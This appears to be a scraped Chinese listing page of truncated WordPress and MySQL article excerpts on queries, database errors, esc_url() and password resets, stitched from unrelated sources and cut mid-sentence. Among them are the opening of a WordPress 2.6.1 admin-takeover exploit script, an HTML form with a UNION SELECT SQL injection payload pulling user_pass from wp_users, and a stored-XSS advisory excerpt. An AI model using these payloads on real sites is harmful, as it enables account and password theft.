大多数使用 WordPress 搭建的网站,其后台都是 MySQL 数据库,经常我们需要定制 WordPress 的功能,这里我们列表 10 个最有用的 WordPress 的数据库查询,你需要一个数据库的管理工具,例如 phpMyAdmin 或者 Navicat 等来执行这些 SQL 语句。1. 将所有文件的作者改为另外一个用户在修改之前,你先要知道两个不同用户的 ID,你可以在 WP 后台的 Author & User 页面中找到这个 ID,或者在查看用户信息时点击用户名的链接,地址栏中...
今天新搭建的LNMP环境,安装wordpress博客做测试,安装到填写数据库信息时,一直报错数据库连接错误,重新创建库,重新授权用户,都提示一样的错误,后来授权使用ip地址,连接成功,发一篇博文大家探讨一下问题所在:创建数据库create database blog;授权用户 grant all on blog.* to blog@localhost identified by ‘123456‘;问题所在:1、在浏览器填写wordpress信息,数据库主机为localhost,不能连接,更改为127.0.0.1 可以连接...
#!/usr/bin/php<?php# ------------------------------------------------------------# quick‘n‘dirty wordpress admin-take0ver poc# by iso^kpsbr in august 2oo8 ## works w/ wordpress 2.6.1## .oO( private -- do not spread! )Oo.## you‘ll have to make sure you run roughly the same# php version as on the server, that is: if server# is >=5.2.1 you‘ll need to be as well, in case# server is <5.2.1,...
有时候当你看到一篇十分优秀的国外文章的时候,比如说十个优秀、五十个优秀的网站设计欣赏、wordpress主题下载、jquery插件下载等等。这些文章当中往往会跟随大量的示例图片供读者查看,如果这些文章很有收藏价值,你可能会直接进行翻译或转载,如果你直接复制过来,文章中图片的路径 还是会指向原来的网站,这样做虽然方便,但是十分不利于seo,因为百度蜘蛛如果爬行到这些指向原文链接的话,就会有很大的几率被搜索引擎识别出你...
wordpress网站转移服务器空间,通过phpmyadmin导入sql数据时出现错误,错误提示:MySQL返回:#1273 – Unknown collation:’utf8mb4_unicode_ci’ 大致意思是“没有定义的编码集utf8mb4”。搜索查询后发现utf8mb4是utf8的一个衍生形式,utf-8里的一个字符只能最多支持3个字节,而utf8mb4则扩展到一个字符支持4个字节。而utf8mb4只有在mysql数据库版本是5.5.3+的时候才支持,网站原mysql的版本是5.6,导入的mysql版本...
<*form method="post"action="http://***/wp-admin/admin-ajax.php?action=get_upcp_subcategories"><*input type="text" name="CatID" value="0 UNION SELECTuser_login,user_pass FROM wp_users WHERE ID=1"><*input type="submit">通过提交的value https://***/wp-admin/admin.php?page=examapp_UserResult&info=view&id=79 and 1=1 Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHE...
转自:Baidu Security Lab Xteam http://xteam.baidu.com/?p=177漏洞概述本次漏洞出现两个使用不同方式截断来实现的存储型xss,一种为特殊字符截断,一种为数据库字段长度截断,该漏洞导致攻击者可获取用户 cookie以及模拟浏览器正常操作,并且当管理员访问到注入的payload时,结合wordpress后台功能甚至可以getshell。 漏洞分析1.字符截断通过官网介绍“The character set named utf8 uses a maximum of three bytes per characte...
网上的方法大致这样:(1)对于windows服务器,找开PHP安装位置,找到php.ini,打开第一步:确认开启以下扩展extension=php_mysql.dllextension=php_mysqli.dll第二步:; On windows:; extension_dir = "ext" 扩展文件存放位置,确认以上丙个扩展文件已经存放在一个叫“ext"的文件夹中,如没有,下载第三步,服务重启,问题解决(2)对于linux服务器,网络上解决方法如下第一步:先用SSH登录,打开PHP.ini#vi /etc/php.ini第二步:php...
esc_url()(过滤链接) 很多 URL 会有一些小错误,用 esc_url() 函数可以屏蔽或者修正这些错误,并且可以拒绝不安全的协议。 esc_url() 函数的工作内容: 默认拒绝不是下面协议的 URL:defaulting to http、https、ftp、ftps、mailto、news、irc、gopher、nntp、feed 和 telnet 删除无效字符和危险的字符 将字符转换成 HTML 实体字符 使用方法 esc_url( $url, $protocols, $_context ); 参数 $url (字符串)(必须)要被过滤的 UR...
PS:近来半个月才登录一次博客后台,每次都发现几千条垃圾广告评论,之前一直用Akismet插件智能识别的,以前效果很好,最近基本失灵了,大部分垃圾评论都没识别到。默认后台只能每次删20条,要一次全删掉几千条,只能用SQL语句操作数据库,顺便总结一下,方PS:近来半个月才登录一次博客后台,每次都发现几千条垃圾广告评论,之前一直用Akismet插件智能识别的,以前效果很好,最近基本失灵了,大部分垃圾评论都没识别到。默认后台只...
在典型的wordpress网站中,有些表的末尾以“元”命名.在这些表中,有2列,一列名为“ meta_key”,一列名为“ meta_value”.存储了任何种类的变量. 这是一个不好的设计吗?这种设计的好处是什么?缺点是什么?解决方法:这完全取决于外部设计-键值表只是存储数据的另一种方式,也是另一种思维方式.就像NoSQL. 您必须研究wordpress如何使用这些表.由于从未研究过数据库架构,因此我无法对wordpress进行过多介绍.我签出的代码很有趣,但没什么...
本篇文章给大家带来的内容是关于wordpress账号密码忘记了通过mysql数据库修改方法(图解),有一定的参考价值,有需要的朋友可以参考一下,希望对你有所帮助。WordPress程序比较普及,大网站,小博客到外贸,都使用的比较多;偶尔有各种原因把密码账号给忘了也是很正常的;WordPress的账户信息都存在数据库。所以要修改,只能通过查找数据库,然后在数据库中才能修改。(推荐课程:MySQL教程)工具/原料phpmyadmin管理器方法/步骤1...
MAMP 这个名字来源于 Macintosh Apache MySQL PHP,显然专门用来在 Mac 环境下搭建 Apache、MySQL、PHP 平台。虽然 OSX 中已经预装了 Apache 1.3.x 和 PHP 4.3.2 环境,但是启用、配置并安装整合 MySQL 仍然是一件极其复杂的工作。MAMP 的特点就是简便(从以下安装步骤即可看出),而且它不会破坏系统本身的文件,所修改、创建文件的范围仅限程序本身。系统要求:Mac OS X 10.4 (Tiger) 及以上(对于 10.3 Panther 用户可以安装 MA...
无聊做了个www.jiazhuangma.com,技术不过关写不好后台,就想直接读wordpress里的数据。做ajax读后台数据时在网上随便搜了一段代码使用wordpress $wpdb类读mysql数据库,就是这么一随便,搜到了别人的去头去尾的code,开始了我的改错之旅。主要问题有:1,non-object2,json中汉字,/被转码3,chrome可以正常访问php文件,ie显示http 404,ajax时头部显示404,但是响应正文正确,是我想要的json。转载请注明http://www.cumt.top/bl...
esc_url()(过滤链接)很多 URL 会有一些小错误,用 esc_url() 函数可以屏蔽或者修正这些错误,并且可以拒绝不安全的协议。esc_url() 函数的工作内容:默认拒绝不是下面协议的 URL:defaulting to http、https、ftp、ftps、mailto、news、irc、gopher、nntp、feed 和 telnet删除无效字符和危险的字符将字符转换成 HTML 实体字符使用方法esc_url( $url, $protocols, $_context ); 参数$url(字符串)(必须)要被过滤的 URL.默认值:...